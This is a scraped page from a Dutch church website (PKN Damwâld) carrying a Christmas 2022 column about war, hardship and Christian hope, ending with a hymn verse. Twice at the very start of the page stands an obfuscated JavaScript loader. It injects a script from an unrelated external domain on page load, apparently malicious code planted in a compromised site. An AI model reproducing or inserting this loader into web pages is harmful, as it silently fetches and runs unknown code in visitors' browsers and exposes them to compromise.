;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Toekomst vol van hoop … - PKN Damwâld

Toekomst vol van hoop …

Gepubliceerd op: vrijdag 9 december 2022

Een totaal verwrongen jaar loopt ten einde …  Sinds februari behoort de oorlog in Europa niet meer tot het verleden, maar is het de verschrikkelijke realiteit van nu. Mensen worden gemarteld en vermoord, steden verwoest, infrastructuur vernietigd. Vrouwen en kinderen uit Oekraïne moesten vluchten en hebben hier onderdak gevonden. Oorlog in de Oekraïne … energiecrisis, toenemende armoede, verharding en tweedeling in de maatschappij, maar geen verbetering in zicht. Het is waar. De situatie is ernstig. Ondanks alle goede voornemens in het afgelopen jaar worden we steeds weer door allerlei tegenslagen, oorlogsgeweld en onheilspellende ziektes getroffen en lijden sommigen aan ‘blindheid’, waanvoorstellingen, mentale duisternis of ontwaren samenzweringstheorieën. Haat en oproepen tot geweld jagen mensen van goede wil angst aan. De vrede in onze samenleving is broos geworden. Scheuren lopen dwars door gezinnen.

Kerst 2022 … het kan zo deprimerend aanvoelen: sommigen voelen zich hopeloos, hulpeloos, afgesneden en eenzaam. Hoe kunnen we Kerst vieren als de wereld om ons heen zo is veranderd? Het is gecompliceerd. Is het, gezien deze situatie, niet dubbel om elkaar in dit “verwrongen” jaar “gezegende kerstdagen” te wensen? Denk eens terug aan de eerste kerst in de geschiedenis van het christendom. Ook toen was het ingewikkeld. Mensen werden lastiggevallen, zelfs hoogzwangere vrouwen werden gedwongen te reizen alleen maar omdat de heersers hun belastinglijsten wilden bijwerken. Niemand gaf toen om risico’s. Accommodatie was ook moeilijk. Een winderige stal, meer zat er niet in. De geboorte van het kindje Jezus vond plaats onder erbarmelijke, onmenselijke omstandigheden. Meteen na de geboorte werd de situatie zo kritiek dat het gezin naar het buitenland moest vluchten. Ook toen was het een volledig verwrongen situatie. Geen verbetering in zicht.

Maar – ook al was het niet meteen voor iedereen zichtbaar – met dit kwetsbare kindje kwam er iets groots en sterks in de wereld: de wetenschap dat God mens werd. Het geloof dat hij dicht bij die mensen staat die in het duister tasten. De hoop dat er een keerpunt naar vrede zal komen. En de ervaring dat liefde uiteindelijk altijd sterker is dan de dood. God gaat het ingewikkelde, het donkere en het moeilijke niet uit de weg. Integendeel: Hij gaat er regelrecht in. Dat is de enige manier waarop het zal veranderen. Deze kerstboodschap mogen we dit jaar dan ook horen met geheel nieuwe oren. Laat het je aanraken, troosten … omdat het hoop op verandering geeft. Laat het je diep in je hart gelukkig maken omdat je mag weten: ziekte, angst en dood zullen niet het laatste woord hebben, maar de Here God! In die zin kunnen we zelfs in dit verwrongen jaar elkaar een uitdagend, vredig en hoopvol 2023 toewensen, maar bovenal … Gezegende kerstdagen!

Toekomst vol van hoop …

In de nacht van strijd en zorgen

kijken wij naar U omhoog,

biddend om een nieuwe morgen,

om een toekomst vol van hoop. 

Columnist:Kees

Leer mij kennen
Uitgelezen?

Gelukkig hebben wij meer columns!

Bekijk al onze columns